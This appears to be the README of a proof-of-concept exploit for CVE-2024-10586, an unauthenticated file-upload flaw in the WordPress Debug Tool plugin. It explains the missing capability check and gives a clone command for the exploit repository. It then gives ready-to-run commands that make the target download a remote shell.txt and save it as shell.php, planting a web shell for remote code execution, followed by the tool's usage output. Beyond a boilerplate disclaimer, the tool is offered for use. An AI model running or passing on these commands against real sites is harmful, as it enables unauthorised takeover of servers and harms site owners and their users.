
Proof-of-concept exploit for CVE-2024-10586 targeting WordPress Debug Tool plugin. Automates arbitrary file upload leading to remote code execution via unauthenticated POST requests.
Description
The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2.
This makes it possible for unauthenticated attackers to create arbitrary files such as .php files that can be leveraged for remote code execution.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Run the script with the following command: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
This script is for educational purposes only. Use it responsibly and only on systems you own or have explicit permission to test. The authors are not responsible for any misuse or damage caused by this tool.